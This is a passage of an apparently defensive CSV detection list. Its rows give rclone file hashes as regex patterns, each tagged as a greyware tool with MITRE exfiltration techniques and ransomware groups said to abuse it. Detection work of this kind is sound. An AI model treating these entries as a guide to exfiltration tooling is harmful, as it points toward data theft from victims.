Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*657337a33b59dcee4cabdbcbb254ed988755adc36a8714539e76f838a88a0345*",".{0,1000}657337a33b59dcee4cabdbcbb254ed988755adc36a8714539e76f838a88a0345.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*65786b035dc5483efb08c767e482a57c2edb8993d11b2bf0d7b0ee68f3d23168*",".{0,1000}65786b035dc5483efb08c767e482a57c2edb8993d11b2bf0d7b0ee68f3d23168.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*658e2b74ab4ed141f1c0794f03e95efe8dc718bffaad44267d290987fc4ecd2c*",".{0,1000}658e2b74ab4ed141f1c0794f03e95efe8dc718bffaad44267d290987fc4ecd2c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*65a291b3d4e59783d3055262819f8aba9cada498e60b578dfe7321be68d45b10*",".{0,1000}65a291b3d4e59783d3055262819f8aba9cada498e60b578dfe7321be68d45b10.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*65b36a7d2b547af519016a6c77eb8870a629ffe740d05bb188817460d34ccae5*",".{0,1000}65b36a7d2b547af519016a6c77eb8870a629ffe740d05bb188817460d34ccae5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*65fb7e17d5786676540f52657cbbb54407ded73b48787d5946f140120db898f0*",".{0,1000}65fb7e17d5786676540f52657cbbb54407ded73b48787d5946f140120db898f0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*6626d67f60eb1fae7cf36b9c6c250e38810fd27878beb6350fadd09bc7110835*",".{0,1000}6626d67f60eb1fae7cf36b9c6c250e38810fd27878beb6350fadd09bc7110835.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*66378582dd58282341dc79f206813fbcfc215a21c0236ae5d162d08503ade743*",".{0,1000}66378582dd58282341dc79f206813fbcfc215a21c0236ae5d162d08503ade743.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*664c2927a15fcf39f6a87c135100c45d021ddbdb6277820507f92590458c3ac4*",".{0,1000}664c2927a15fcf39f6a87c135100c45d021ddbdb6277820507f92590458c3ac4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*66911ebca32cf181fc029455979e0be46b057cc0f7516c4cbabbf4fd6a5578f8*",".{0,1000}66911ebca32cf181fc029455979e0be46b057cc0f7516c4cbabbf4fd6a5578f8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*66ca083757fb22198309b73879831ed2b42309892394bf193ff95c75dff69c73*",".{0,1000}66ca083757fb22198309b73879831ed2b42309892394bf193ff95c75dff69c73.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*670e18960efd34bae9d1a0152a54f16ba0c6b8fad728d7ff4ea8b141ef1ed93d*",".{0,1000}670e18960efd34bae9d1a0152a54f16ba0c6b8fad728d7ff4ea8b141ef1ed93d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*671e11ba1db069358185dff58705ad2d6b244f16026541e48443fe4d5f3be747*",".{0,1000}671e11ba1db069358185dff58705ad2d6b244f16026541e48443fe4d5f3be747.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*67565a74ae8ccdcf388bf100bc96712ff579a4774e6a8feeaeb6357b8335277d*",".{0,1000}67565a74ae8ccdcf388bf100bc96712ff579a4774e6a8feeaeb6357b8335277d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*6765fae1d6833ddd5f57815c1925ee564b4ac3ced93a6bde383ad843d2e94000*",".{0,1000}6765fae1d6833ddd5f57815c1925ee564b4ac3ced93a6bde383ad843d2e94000.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*68248a96b04afe29d0e807c5c5adcf05c9c86a699080cbd69de2bef1e2d94140*",".{0,1000}68248a96b04afe29d0e807c5c5adcf05c9c86a699080cbd69de2bef1e2d94140.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*687a576ce0781327c1b94663364685e9d59f28359e3d6a60b2ed59cfccdf9c3e*",".{0,1000}687a576ce0781327c1b94663364685e9d59f28359e3d6a60b2ed59cfccdf9c3e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*68bc7bb6b8359d8e92afce33991d3f3a4f13f91420a30927a3246e7ee47958b8*",".{0,1000}68bc7bb6b8359d8e92afce33991d3f3a4f13f91420a30927a3246e7ee47958b8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*69163ce90631331f5df44f08f2cc5a32f851eea7dd25af4e881a4ab1e8de83c4*",".{0,1000}69163ce90631331f5df44f08f2cc5a32f851eea7dd25af4e881a4ab1e8de83c4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*691d5d6406e5a2eb28bac68053fde03bbb4c749647f0ea54f7f5b2b173ef2ae3*",".{0,1000}691d5d6406e5a2eb28bac68053fde03bbb4c749647f0ea54f7f5b2b173ef2ae3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*692af170382b823e32c575826762a222de1d34bf355f99858a80d8077c46bb86*",".{0,1000}692af170382b823e32c575826762a222de1d34bf355f99858a80d8077c46bb86.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*6932ff5ad4b81f5a8b7a04b58353d07e65be9ae7502922befee48a9b7056c8c8*",".{0,1000}6932ff5ad4b81f5a8b7a04b58353d07e65be9ae7502922befee48a9b7056c8c8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*694dc37c05dd6b897373b036c3c6f6845b6f962baffcaf20165822cf724fc4de*",".{0,1000}694dc37c05dd6b897373b036c3c6f6845b6f962baffcaf20165822cf724fc4de.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*6959843cd7199564fcca1fd32d727e25468d8d71a9526ebff9cbf0dd3a7cfedf*",".{0,1000}6959843cd7199564fcca1fd32d727e25468d8d71a9526ebff9cbf0dd3a7cfedf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*695cc49fc317d1c8180653884dd700bcb917ff4c881c66492f2eb62fabbaa37b*",".{0,1000}695cc49fc317d1c8180653884dd700bcb917ff4c881c66492f2eb62fabbaa37b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*698f1224df6146dd25de72204b2d5937b260abdf61496b90337926c78b92d29b*",".{0,1000}698f1224df6146dd25de72204b2d5937b260abdf61496b90337926c78b92d29b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*6991cdf954dc1232832440f0578fd68fc06ebe86ce2a565cda8004de23c269d4*",".{0,1000}6991cdf954dc1232832440f0578fd68fc06ebe86ce2a565cda8004de23c269d4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*6999c0176530816b444a27fb92404efa57068e5ab5fce5ea3334cedcfd461211*",".{0,1000}6999c0176530816b444a27fb92404efa57068e5ab5fce5ea3334cedcfd461211.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*699ce703e508d2d05acfcc4317816741e2a393c8a3d7bdc0aa93c85f98dd6972*",".{0,1000}699ce703e508d2d05acfcc4317816741e2a393c8a3d7bdc0aa93c85f98dd6972.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*69cbed2ab8028723ed6b37d9680f9ac58e4cad8cefaa3d9215eb091462a03001*",".{0,1000}69cbed2ab8028723ed6b37d9680f9ac58e4cad8cefaa3d9215eb091462a03001.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*6a15569e7313b2e1ada69fa8b3ad6f7ed12934ad8b6c9991c4364d0088b74adf*",".{0,1000}6a15569e7313b2e1ada69fa8b3ad6f7ed12934ad8b6c9991c4364d0088b74adf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*6a40ebd2f3e3f2bfd8836b27c7d6db08cabb84e43845cee5c48d61e7daf98c8e*",".{0,1000}6a40ebd2f3e3f2bfd8836b27c7d6db08cabb84e43845cee5c48d61e7daf98c8e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*6a713689f4bbbdd3d72bfc4e3afb69034e0def7a2ff0e2f68869a422532b80cd*",".{0,1000}6a713689f4bbbdd3d72bfc4e3afb69034e0def7a2ff0e2f68869a422532b80cd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*6b26959b03bef47449a97288ed0ca0e136d6308affa626496c9a04d9b7632a03*",".{0,1000}6b26959b03bef47449a97288ed0ca0e136d6308affa626496c9a04d9b7632a03.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*6ba81dd21c13ae539695ecb47a9e7211f892edb6ecf6803324d89bfa07773cdc*",".{0,1000}6ba81dd21c13ae539695ecb47a9e7211f892edb6ecf6803324d89bfa07773cdc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*6be7a09e3e3bc55af0ee9f00ea17fafdd8a38541ef2de21b8e804729b41af298*",".{0,1000}6be7a09e3e3bc55af0ee9f00ea17fafdd8a38541ef2de21b8e804729b41af298.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
